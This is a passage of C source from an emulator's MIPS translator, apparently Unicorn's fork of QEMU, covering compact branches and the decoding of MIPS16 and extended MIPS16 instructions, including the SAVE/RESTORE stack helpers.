tcg_gen_add_tl(tcg_ctx, t4, t2, t3); tcg_gen_ext32s_tl(tcg_ctx, t4, t4); tcg_gen_xor_tl(tcg_ctx, t2, t2, t3); tcg_gen_xor_tl(tcg_ctx, t3, t4, t3); tcg_gen_andc_tl(tcg_ctx, t2, t3, t2); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, t4, t2, 0); tcg_gen_or_tl(tcg_ctx, t4, t4, input_overflow); if (opc == OPC_BOVC) { /* OPC_BOVC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_NE), t4, 0, fs); } else { /* OPC_BNVC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t4, 0, fs); } tcg_temp_free(tcg_ctx, input_overflow); tcg_temp_free(tcg_ctx, t4); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } else if (rs < rt && rs == 0) { /* OPC_BEQZALC, OPC_BNEZALC */ if (opc == OPC_BEQZALC) { /* OPC_BEQZALC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t1, 0, fs); } else { /* OPC_BNEZALC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_NE), t1, 0, fs); } } else { /* OPC_BEQC, OPC_BNEC */ if (opc == OPC_BEQC) { /* OPC_BEQC */ tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t0, t1, fs); } else { /* OPC_BNEC */ tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_NE), t0, t1, fs); } } break; case OPC_BEQZC: tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t0, 0, fs); break; case OPC_BNEZC: tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_NE), t0, 0, fs); break; default: MIPS_INVAL("Compact conditional branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } /* Generating branch here as compact branches don't have delay slot */ gen_goto_tb(ctx, 1, ctx->btarget); gen_set_label(tcg_ctx, fs); ctx->hflags |= MIPS_HFLAG_FBNSLOT; } out: tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* ISA extensions (ASEs) */ /* MIPS16 extension to MIPS32 */ /* MIPS16 major opcodes */ enum { M16_OPC_ADDIUSP = 0x00, M16_OPC_ADDIUPC = 0x01, M16_OPC_B = 0x02, M16_OPC_JAL = 0x03, M16_OPC_BEQZ = 0x04, M16_OPC_BNEQZ = 0x05, M16_OPC_SHIFT = 0x06, M16_OPC_LD = 0x07, M16_OPC_RRIA = 0x08, M16_OPC_ADDIU8 = 0x09, M16_OPC_SLTI = 0x0a, M16_OPC_SLTIU = 0x0b, M16_OPC_I8 = 0x0c, M16_OPC_LI = 0x0d, M16_OPC_CMPI = 0x0e, M16_OPC_SD = 0x0f, M16_OPC_LB = 0x10, M16_OPC_LH = 0x11, M16_OPC_LWSP = 0x12, M16_OPC_LW = 0x13, M16_OPC_LBU = 0x14, M16_OPC_LHU = 0x15, M16_OPC_LWPC = 0x16, M16_OPC_LWU = 0x17, M16_OPC_SB = 0x18, M16_OPC_SH = 0x19, M16_OPC_SWSP = 0x1a, M16_OPC_SW = 0x1b, M16_OPC_RRR = 0x1c, M16_OPC_RR = 0x1d, M16_OPC_EXTEND = 0x1e, M16_OPC_I64 = 
0x1f }; /* I8 funct field */ enum { I8_BTEQZ = 0x0, I8_BTNEZ = 0x1, I8_SWRASP = 0x2, I8_ADJSP = 0x3, I8_SVRS = 0x4, I8_MOV32R = 0x5, I8_MOVR32 = 0x7 }; /* RRR f field */ enum { RRR_DADDU = 0x0, RRR_ADDU = 0x1, RRR_DSUBU = 0x2, RRR_SUBU = 0x3 }; /* RR funct field */ enum { RR_JR = 0x00, RR_SDBBP = 0x01, RR_SLT = 0x02, RR_SLTU = 0x03, RR_SLLV = 0x04, RR_BREAK = 0x05, RR_SRLV = 0x06, RR_SRAV = 0x07, RR_DSRL = 0x08, RR_CMP = 0x0a, RR_NEG = 0x0b, RR_AND = 0x0c, RR_OR = 0x0d, RR_XOR = 0x0e, RR_NOT = 0x0f, RR_MFHI = 0x10, RR_CNVT = 0x11, RR_MFLO = 0x12, RR_DSRA = 0x13, RR_DSLLV = 0x14, RR_DSRLV = 0x16, RR_DSRAV = 0x17, RR_MULT = 0x18, RR_MULTU = 0x19, RR_DIV = 0x1a, RR_DIVU = 0x1b, RR_DMULT = 0x1c, RR_DMULTU = 0x1d, RR_DDIV = 0x1e, RR_DDIVU = 0x1f }; /* I64 funct field */ enum { I64_LDSP = 0x0, I64_SDSP = 0x1, I64_SDRASP = 0x2, I64_DADJSP = 0x3, I64_LDPC = 0x4, I64_DADDIU5 = 0x5, I64_DADDIUPC = 0x6, I64_DADDIUSP = 0x7 }; /* RR ry field for CNVT */ enum { RR_RY_CNVT_ZEB = 0x0, RR_RY_CNVT_ZEH = 0x1, RR_RY_CNVT_ZEW = 0x2, RR_RY_CNVT_SEB = 0x4, RR_RY_CNVT_SEH = 0x5, RR_RY_CNVT_SEW = 0x6, }; static int xlat(int r) { static int map[] = { 16, 17, 2, 3, 4, 5, 6, 7 }; return map[r]; } static void gen_mips16_save(DisasContext *ctx, int xsregs, int aregs, int do_ra, int do_s0, int do_s1, int framesize) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); int args, astatic; switch (aregs) { case 0: case 1: case 2: case 3: case 11: args = 0; break; case 4: case 5: case 6: case 7: args = 1; break; case 8: case 9: case 10: args = 2; break; case 12: case 13: args = 3; break; case 14: args = 4; break; default: generate_exception_end(ctx, EXCP_RI); return; } switch (args) { case 4: gen_base_offset_addr(ctx, t0, 29, 12); gen_load_gpr(tcg_ctx, t1, 7); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); /* Fall through */ case 3: gen_base_offset_addr(ctx, t0, 29, 8); gen_load_gpr(tcg_ctx, t1, 6); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); /* Fall through */ case 2: gen_base_offset_addr(ctx, t0, 29, 4); gen_load_gpr(tcg_ctx, t1, 5); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); /* Fall through */ case 1: gen_base_offset_addr(ctx, t0, 29, 0); gen_load_gpr(tcg_ctx, t1, 4); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); } gen_load_gpr(tcg_ctx, t0, 29); #define DECR_AND_STORE(reg) do { \ tcg_gen_movi_tl(tcg_ctx, t2, -4); \ gen_op_addr_add(ctx, t0, t0, t2); \ gen_load_gpr(tcg_ctx, t1, reg); \ tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); \ } while (0) if (do_ra) { DECR_AND_STORE(31); } switch (xsregs) { case 7: DECR_AND_STORE(30); /* Fall through */ case 6: DECR_AND_STORE(23); /* Fall through */ case 5: DECR_AND_STORE(22); /* Fall through */ case 4: DECR_AND_STORE(21); /* Fall through */ case 3: DECR_AND_STORE(20); /* Fall through */ case 2: DECR_AND_STORE(19); /* Fall through */ case 1: DECR_AND_STORE(18); } if (do_s1) { DECR_AND_STORE(17); } if (do_s0) { DECR_AND_STORE(16); } switch (aregs) { case 0: case 4: case 8: case 12: case 14: astatic = 0; break; case 1: case 5: case 9: case 13: astatic = 1; break; case 2: case 6: case 10: astatic = 2; break; case 3: case 7: astatic = 3; break; case 11: astatic = 4; break; default: generate_exception_end(ctx, EXCP_RI); return; } if (astatic > 0) { DECR_AND_STORE(7); if (astatic > 1) { DECR_AND_STORE(6); if (astatic > 2) { DECR_AND_STORE(5); if (astatic > 3) { DECR_AND_STORE(4); } } } } #undef DECR_AND_STORE 
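/* Every store above walked the cursor t0 downwards from the incoming SP; only now is SP itself dropped by the already 8-byte-scaled framesize, i.e. the MIPS16e SAVE adjusts the stack pointer once, after the whole register block has been written. */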
tcg_gen_movi_tl(tcg_ctx, t2, -framesize); gen_op_addr_add(ctx, tcg_ctx->cpu_gpr[29], tcg_ctx->cpu_gpr[29], t2); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } static void gen_mips16_restore(DisasContext *ctx, int xsregs, int aregs, int do_ra, int do_s0, int do_s1, int framesize) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int astatic; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, t2, framesize); gen_op_addr_add(ctx, t0, tcg_ctx->cpu_gpr[29], t2); #define DECR_AND_LOAD(reg) do { \ tcg_gen_movi_tl(tcg_ctx, t2, -4); \ gen_op_addr_add(ctx, t0, t0, t2); \ tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TESL); \ gen_store_gpr(tcg_ctx, t1, reg); \ } while (0) if (do_ra) { DECR_AND_LOAD(31); } switch (xsregs) { case 7: DECR_AND_LOAD(30); /* Fall through */ case 6: DECR_AND_LOAD(23); /* Fall through */ case 5: DECR_AND_LOAD(22); /* Fall through */ case 4: DECR_AND_LOAD(21); /* Fall through */ case 3: DECR_AND_LOAD(20); /* Fall through */ case 2: DECR_AND_LOAD(19); /* Fall through */ case 1: DECR_AND_LOAD(18); } if (do_s1) { DECR_AND_LOAD(17); } if (do_s0) { DECR_AND_LOAD(16); } switch (aregs) { case 0: case 4: case 8: case 12: case 14: astatic = 0; break; case 1: case 5: case 9: case 13: astatic = 1; break; case 2: case 6: case 10: astatic = 2; break; case 3: case 7: astatic = 3; break; case 11: astatic = 4; break; default: generate_exception_end(ctx, EXCP_RI); return; } if (astatic > 0) { DECR_AND_LOAD(7); if (astatic > 1) { DECR_AND_LOAD(6); if (astatic > 2) { DECR_AND_LOAD(5); if (astatic > 3) { DECR_AND_LOAD(4); } } } } #undef DECR_AND_LOAD tcg_gen_movi_tl(tcg_ctx, t2, framesize); gen_op_addr_add(ctx, tcg_ctx->cpu_gpr[29], tcg_ctx->cpu_gpr[29], t2); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } static void gen_addiupc(DisasContext *ctx, int rx, int imm, int is_64_bit, int extended) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; if (extended && (ctx->hflags & MIPS_HFLAG_BMASK)) { generate_exception_end(ctx, EXCP_RI); return; } t0 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, t0, pc_relative_pc(ctx)); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], t0, imm); if (!is_64_bit) { tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], tcg_ctx->cpu_gpr[rx]); } tcg_temp_free(tcg_ctx, t0); } static void gen_cache_operation(DisasContext *ctx, uint32_t op, int base, int16_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, op); TCGv t1 = tcg_temp_new(tcg_ctx); gen_base_offset_addr(ctx, t1, base, offset); gen_helper_cache(tcg_ctx, tcg_ctx->cpu_env, t1, t0); } #if defined(TARGET_MIPS64) static void decode_i64_mips16(DisasContext *ctx, int ry, int funct, int16_t offset, int extended) { switch (funct) { case I64_LDSP: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); offset = extended ? offset : offset << 3; gen_ld(ctx, OPC_LD, ry, 29, offset); break; case I64_SDSP: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); offset = extended ? offset : offset << 3; gen_st(ctx, OPC_SD, ry, 29, offset); break; case I64_SDRASP: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); offset = extended ? offset : (ctx->opcode & 0xff) << 3; gen_st(ctx, OPC_SD, 31, 29, offset); break; case I64_DADJSP: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); offset = extended ? 
offset : ((int8_t)ctx->opcode) << 3; gen_arith_imm(ctx, OPC_DADDIU, 29, 29, offset); break; case I64_LDPC: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); if (extended && (ctx->hflags & MIPS_HFLAG_BMASK)) { generate_exception_end(ctx, EXCP_RI); } else { offset = extended ? offset : offset << 3; gen_ld(ctx, OPC_LDPC, ry, 0, offset); } break; case I64_DADDIU5: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); offset = extended ? offset : ((int8_t)(offset << 3)) >> 3; gen_arith_imm(ctx, OPC_DADDIU, ry, ry, offset); break; case I64_DADDIUPC: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); offset = extended ? offset : offset << 2; gen_addiupc(ctx, ry, offset, 1, extended); break; case I64_DADDIUSP: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); offset = extended ? offset : offset << 2; gen_arith_imm(ctx, OPC_DADDIU, ry, 29, offset); break; } } #endif static int decode_extended_mips16_opc(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int extend = cpu_lduw_code(env, ctx->base.pc_next + 2); int op, rx, ry, funct, sa; int16_t imm, offset; ctx->opcode = (ctx->opcode << 16) | extend; op = (ctx->opcode >> 11) & 0x1f; sa = (ctx->opcode >> 22) & 0x1f; funct = (ctx->opcode >> 8) & 0x7; rx = xlat((ctx->opcode >> 8) & 0x7); ry = xlat((ctx->opcode >> 5) & 0x7); offset = imm = (int16_t) (((ctx->opcode >> 16) & 0x1f) << 11 | ((ctx->opcode >> 21) & 0x3f) << 5 | (ctx->opcode & 0x1f)); /* * The extended opcodes cleverly reuse the opcodes from their 16-bit * counterparts. */ switch (op) { case M16_OPC_ADDIUSP: gen_arith_imm(ctx, OPC_ADDIU, rx, 29, imm); break; case M16_OPC_ADDIUPC: gen_addiupc(ctx, rx, imm, 0, 1); break; case M16_OPC_B: gen_compute_branch(ctx, OPC_BEQ, 4, 0, 0, offset << 1, 0); /* No delay slot, so just process as a normal instruction */ break; case M16_OPC_BEQZ: gen_compute_branch(ctx, OPC_BEQ, 4, rx, 0, offset << 1, 0); /* No delay slot, so just process as a normal instruction */ break; case M16_OPC_BNEQZ: gen_compute_branch(ctx, OPC_BNE, 4, rx, 0, offset << 1, 0); /* No delay slot, so just process as a normal instruction */ break; case M16_OPC_SHIFT: switch (ctx->opcode & 0x3) { case 0x0: gen_shift_imm(ctx, OPC_SLL, rx, ry, sa); break; case 0x1: #if defined(TARGET_MIPS64) check_mips_64(ctx); gen_shift_imm(ctx, OPC_DSLL, rx, ry, sa); #else generate_exception_end(ctx, EXCP_RI); #endif break; case 0x2: gen_shift_imm(ctx, OPC_SRL, rx, ry, sa); break; case 0x3: gen_shift_imm(ctx, OPC_SRA, rx, ry, sa); break; } break; #if defined(TARGET_MIPS64) case M16_OPC_LD: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_ld(ctx, OPC_LD, ry, rx, offset); break; #endif case M16_OPC_RRIA: imm = ctx->opcode & 0xf; imm = imm | ((ctx->opcode >> 20) & 0x7f) << 4; imm = imm | ((ctx->opcode >> 16) & 0xf) << 11; imm = (int16_t) (imm << 1) >> 1; if ((ctx->opcode >> 4) & 0x1) { #if defined(TARGET_MIPS64) check_mips_64(ctx); gen_arith_imm(ctx, OPC_DADDIU, ry, rx, imm); #else generate_exception_end(ctx, EXCP_RI); #endif } else { gen_arith_imm(ctx, OPC_ADDIU, ry, rx, imm); } break; case M16_OPC_ADDIU8: gen_arith_imm(ctx, OPC_ADDIU, rx, rx, imm); break; case M16_OPC_SLTI: gen_slt_imm(ctx, OPC_SLTI, 24, rx, imm); break; case M16_OPC_SLTIU: gen_slt_imm(ctx, OPC_SLTIU, 24, rx, imm); break; case M16_OPC_I8: switch (funct) { case I8_BTEQZ: gen_compute_branch(ctx, OPC_BEQ, 4, 24, 0, offset << 1, 0); break; case I8_BTNEZ: gen_compute_branch(ctx, OPC_BNE, 4, 24, 0, offset << 1, 0); break; case I8_SWRASP: gen_st(ctx, OPC_SW, 31, 29, imm); break; case I8_ADJSP: gen_arith_imm(ctx, OPC_ADDIU, 29, 29, 
imm); break; case I8_SVRS: check_insn(ctx, ISA_MIPS32); { int xsregs = (ctx->opcode >> 24) & 0x7; int aregs = (ctx->opcode >> 16) & 0xf; int do_ra = (ctx->opcode >> 6) & 0x1; int do_s0 = (ctx->opcode >> 5) & 0x1; int do_s1 = (ctx->opcode >> 4) & 0x1; int framesize = (((ctx->opcode >> 20) & 0xf) << 4 | (ctx->opcode & 0xf)) << 3; if (ctx->opcode & (1 << 7)) { gen_mips16_save(ctx, xsregs, aregs, do_ra, do_s0, do_s1, framesize); } else { gen_mips16_restore(ctx, xsregs, aregs, do_ra, do_s0, do_s1, framesize); } } break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case M16_OPC_LI: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], (uint16_t) imm); break; case M16_OPC_CMPI: tcg_gen_xori_tl(tcg_ctx, tcg_ctx->cpu_gpr[24], tcg_ctx->cpu_gpr[rx], (uint16_t) imm); break; #if defined(TARGET_MIPS64) case M16_OPC_SD: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_st(ctx, OPC_SD, ry, rx, offset); break; #endif case M16_OPC_LB: gen_ld(ctx, OPC_LB, ry, rx, offset); break; case M16_OPC_LH: gen_ld(ctx, OPC_LH, ry, rx, offset); break; case M16_OPC_LWSP: gen_ld(ctx, OPC_LW, rx, 29, offset); break; case M16_OPC_LW: gen_ld(ctx, OPC_LW, ry, rx, offset); break; case M16_OPC_LBU: gen_ld(ctx, OPC_LBU, ry, rx, offset); break; case M16_OPC_LHU: gen_ld(ctx, OPC_LHU, ry, rx, offset); break; case M16_OPC_LWPC: gen_ld(ctx, OPC_LWPC, rx, 0, offset); break; #if defined(TARGET_MIPS64) case M16_OPC_LWU: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_ld(ctx, OPC_LWU, ry, rx, offset); break; #endif case M16_OPC_SB: gen_st(ctx, OPC_SB, ry, rx, offset); break; case M16_OPC_SH: gen_st(ctx, OPC_SH, ry, rx, offset); break; case M16_OPC_SWSP: gen_st(ctx, OPC_SW, rx, 29, offset); break; case M16_OPC_SW: gen_st(ctx, OPC_SW, ry, rx, offset); break; #if defined(TARGET_MIPS64) case M16_OPC_I64: decode_i64_mips16(ctx, ry, funct, offset, 1); break; #endif default: generate_exception_end(ctx, EXCP_RI); break; } return 4; } static inline bool is_uhi(int sdbbp_code) { // return semihosting_enabled() && sdbbp_code == 1; FIXME return false; } static int decode_mips16_opc(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rx, ry; int sa; int op, cnvt_op, op1, offset; int funct; int n_bytes; op = (ctx->opcode >> 11) & 0x1f; sa = (ctx->opcode >> 2) & 0x7; sa = sa == 0 ? 8 : sa; rx = xlat((ctx->opcode >> 8) & 0x7); cnvt_op = (ctx->opcode >> 5) & 0x7; ry = xlat((ctx->opcode >> 5) & 0x7); op1 = offset = ctx->opcode & 0x1f; n_bytes = 2; switch (op) { case M16_OPC_ADDIUSP: { int16_t imm = ((uint8_t) ctx->opcode) << 2; gen_arith_imm(ctx, OPC_ADDIU, rx, 29, imm); } break; case M16_OPC_ADDIUPC: gen_addiupc(ctx, rx, ((uint8_t) ctx->opcode) << 2, 0, 0); break; case M16_OPC_B: offset = (ctx->opcode & 0x7ff) << 1; offset = (int16_t)(offset << 4) >> 4; gen_compute_branch(ctx, OPC_BEQ, 2, 0, 0, offset, 0); /* No delay slot, so just process as a normal instruction */ break; case M16_OPC_JAL: offset = cpu_lduw_code(env, ctx->base.pc_next + 2); offset = (((ctx->opcode & 0x1f) << 21) | ((ctx->opcode >> 5) & 0x1f) << 16 | offset) << 2; op = ((ctx->opcode >> 10) & 0x1) ? 
OPC_JALX : OPC_JAL; gen_compute_branch(ctx, op, 4, rx, ry, offset, 2); n_bytes = 4; break; case M16_OPC_BEQZ: gen_compute_branch(ctx, OPC_BEQ, 2, rx, 0, ((int8_t)ctx->opcode) << 1, 0); /* No delay slot, so just process as a normal instruction */ break; case M16_OPC_BNEQZ: gen_compute_branch(ctx, OPC_BNE, 2, rx, 0, ((int8_t)ctx->opcode) << 1, 0); /* No delay slot, so just process as a normal instruction */ break; case M16_OPC_SHIFT: switch (ctx->opcode & 0x3) { case 0x0: gen_shift_imm(ctx, OPC_SLL, rx, ry, sa); break; case 0x1: #if defined(TARGET_MIPS64) check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift_imm(ctx, OPC_DSLL, rx, ry, sa); #else generate_exception_end(ctx, EXCP_RI); #endif break; case 0x2: gen_shift_imm(ctx, OPC_SRL, rx, ry, sa); break; case 0x3: gen_shift_imm(ctx, OPC_SRA, rx, ry, sa); break; } break; #if defined(TARGET_MIPS64) case M16_OPC_LD: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_ld(ctx, OPC_LD, ry, rx, offset << 3); break; #endif case M16_OPC_RRIA: { int16_t imm = (int8_t)((ctx->opcode & 0xf) << 4) >> 4; if ((ctx->opcode >> 4) & 1) { #if defined(TARGET_MIPS64) check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_arith_imm(ctx, OPC_DADDIU, ry, rx, imm); #else generate_exception_end(ctx, EXCP_RI); #endif } else { gen_arith_imm(ctx, OPC_ADDIU, ry, rx, imm); } } break; case M16_OPC_ADDIU8: { int16_t imm = (int8_t) ctx->opcode; gen_arith_imm(ctx, OPC_ADDIU, rx, rx, imm); } break; case M16_OPC_SLTI: { int16_t imm = (uint8_t) ctx->opcode; gen_slt_imm(ctx, OPC_SLTI, 24, rx, imm); } break; case M16_OPC_SLTIU: { int16_t imm = (uint8_t) ctx->opcode; gen_slt_imm(ctx, OPC_SLTIU, 24, rx, imm); } break; case M16_OPC_I8: { int reg32; funct = (ctx->opcode >> 8) & 0x7; switch (funct) { case I8_BTEQZ: gen_compute_branch(ctx, OPC_BEQ, 2, 24, 0, ((int8_t)ctx->opcode) << 1, 0); break; case I8_BTNEZ: gen_compute_branch(ctx, OPC_BNE, 2, 24, 0, ((int8_t)ctx->opcode) << 1, 0); break; case I8_SWRASP: gen_st(ctx, OPC_SW, 31, 29, (ctx->opcode & 0xff) << 2); break; case I8_ADJSP: gen_arith_imm(ctx, OPC_ADDIU, 29, 29, ((int8_t)ctx->opcode) << 3); break; case I8_SVRS: check_insn(ctx, ISA_MIPS32); { int do_ra = ctx->opcode & (1 << 6); int do_s0 = ctx->opcode & (1 << 5); int do_s1 = ctx->opcode & (1 << 4); int framesize = ctx->opcode & 0xf; if (framesize == 0) { framesize = 128; } else { framesize = framesize << 3; } if (ctx->opcode & (1 << 7)) { gen_mips16_save(ctx, 0, 0, do_ra, do_s0, do_s1, framesize); } else { gen_mips16_restore(ctx, 0, 0, do_ra, do_s0, do_s1, framesize); } } break; case I8_MOV32R: { int rz = xlat(ctx->opcode & 0x7); reg32 = (((ctx->opcode >> 3) & 0x3) << 3) | ((ctx->opcode >> 5) & 0x7); gen_arith(ctx, OPC_ADDU, reg32, rz, 0); } break; case I8_MOVR32: reg32 = ctx->opcode & 0x1f; gen_arith(ctx, OPC_ADDU, ry, reg32, 0); break; default: generate_exception_end(ctx, EXCP_RI); break; } } break; case M16_OPC_LI: { int16_t imm = (uint8_t) ctx->opcode; gen_arith_imm(ctx, OPC_ADDIU, rx, 0, imm); } break; case M16_OPC_CMPI: { int16_t imm = (uint8_t) ctx->opcode; gen_logic_imm(ctx, OPC_XORI, 24, rx, imm); } break; #if defined(TARGET_MIPS64) case M16_OPC_SD: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_st(ctx, OPC_SD, ry, rx, offset << 3); break; #endif case M16_OPC_LB: gen_ld(ctx, OPC_LB, ry, rx, offset); break; case M16_OPC_LH: gen_ld(ctx, OPC_LH, ry, rx, offset << 1); break; case M16_OPC_LWSP: gen_ld(ctx, OPC_LW, rx, 29, ((uint8_t)ctx->opcode) << 2); break; case M16_OPC_LW: gen_ld(ctx, OPC_LW, ry, rx, offset << 2); break; case M16_OPC_LBU: gen_ld(ctx, OPC_LBU, ry, rx, 
offset); break; case M16_OPC_LHU: gen_ld(ctx, OPC_LHU, ry, rx, offset << 1); break; case M16_OPC_LWPC: gen_ld(ctx, OPC_LWPC, rx, 0, ((uint8_t)ctx->opcode) << 2); break; #if defined(TARGET_MIPS64) case M16_OPC_LWU: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_ld(ctx, OPC_LWU, ry, rx, offset << 2); break; #endif case M16_OPC_SB: gen_st(ctx, OPC_SB, ry, rx, offset); break; case M16_OPC_SH: gen_st(ctx, OPC_SH, ry, rx, offset << 1); break; case M16_OPC_SWSP: gen_st(ctx, OPC_SW, rx, 29, ((uint8_t)ctx->opcode) << 2); break; case M16_OPC_SW: gen_st(ctx, OPC_SW, ry, rx, offset << 2); break; case M16_OPC_RRR: { int rz = xlat((ctx->opcode >> 2) & 0x7); int mips32_op; switch (ctx->opcode & 0x3) { case RRR_ADDU: mips32_op = OPC_ADDU; break; case RRR_SUBU: mips32_op = OPC_SUBU; break; #if defined(TARGET_MIPS64) case RRR_DADDU: mips32_op = OPC_DADDU; check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); break; case RRR_DSUBU: mips32_op = OPC_DSUBU; check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); break; #endif default: generate_exception_end(ctx, EXCP_RI); goto done; } gen_arith(ctx, mips32_op, rz, rx, ry); done: ; } break; case M16_OPC_RR: switch (op1) { case RR_JR: { int nd = (ctx->opcode >> 7) & 0x1; int link = (ctx->opcode >> 6) & 0x1; int ra = (ctx->opcode >> 5) & 0x1; if (nd) { check_insn(ctx, ISA_MIPS32); } if (link) { op = OPC_JALR; } else { op = OPC_JR; } gen_compute_branch(ctx, op, 2, ra ? 31 : rx, 31, 0, (nd ? 0 : 2)); } break; case RR_SDBBP: if (is_uhi(extract32(ctx->opcode, 5, 6))) { // gen_helper_do_semihosting(tcg_ctx, tcg_ctx->cpu_env); } else { /* * XXX: not clear which exception should be raised * when in debug mode... */ check_insn(ctx, ISA_MIPS32); generate_exception_end(ctx, EXCP_DBp); } break; case RR_SLT: gen_slt(ctx, OPC_SLT, 24, rx, ry); break; case RR_SLTU: gen_slt(ctx, OPC_SLTU, 24, rx, ry); break; case RR_BREAK: generate_exception_end(ctx, EXCP_BREAK); break; case RR_SLLV: gen_shift(ctx, OPC_SLLV, ry, rx, ry); break; case RR_SRLV: gen_shift(ctx, OPC_SRLV, ry, rx, ry); break; case RR_SRAV: gen_shift(ctx, OPC_SRAV, ry, rx, ry); break; #if defined(TARGET_MIPS64) case RR_DSRL: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift_imm(ctx, OPC_DSRL, ry, ry, sa); break; #endif case RR_CMP: gen_logic(ctx, OPC_XOR, 24, rx, ry); break; case RR_NEG: gen_arith(ctx, OPC_SUBU, rx, 0, ry); break; case RR_AND: gen_logic(ctx, OPC_AND, rx, rx, ry); break; case RR_OR: gen_logic(ctx, OPC_OR, rx, rx, ry); break; case RR_XOR: gen_logic(ctx, OPC_XOR, rx, rx, ry); break; case RR_NOT: gen_logic(ctx, OPC_NOR, rx, ry, 0); break; case RR_MFHI: gen_HILO(ctx, OPC_MFHI, 0, rx); break; case RR_CNVT: check_insn(ctx, ISA_MIPS32); switch (cnvt_op) { case RR_RY_CNVT_ZEB: tcg_gen_ext8u_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], tcg_ctx->cpu_gpr[rx]); break; case RR_RY_CNVT_ZEH: tcg_gen_ext16u_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], tcg_ctx->cpu_gpr[rx]); break; case RR_RY_CNVT_SEB: tcg_gen_ext8s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], tcg_ctx->cpu_gpr[rx]); break; case RR_RY_CNVT_SEH: tcg_gen_ext16s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], tcg_ctx->cpu_gpr[rx]); break; #if defined(TARGET_MIPS64) case RR_RY_CNVT_ZEW: check_insn(ctx, ISA_MIPS64); check_mips_64(ctx); tcg_gen_ext32u_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], tcg_ctx->cpu_gpr[rx]); break; case RR_RY_CNVT_SEW: check_insn(ctx, ISA_MIPS64); check_mips_64(ctx); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], tcg_ctx->cpu_gpr[rx]); break; #endif default: generate_exception_end(ctx, EXCP_RI); break; } break; case RR_MFLO: gen_HILO(ctx, OPC_MFLO, 0, rx); break; #if defined(TARGET_MIPS64) 
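/* Doubleword RR-format shifts: each case below verifies ISA_MIPS3 and that 64-bit operations are enabled before emitting anything. */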
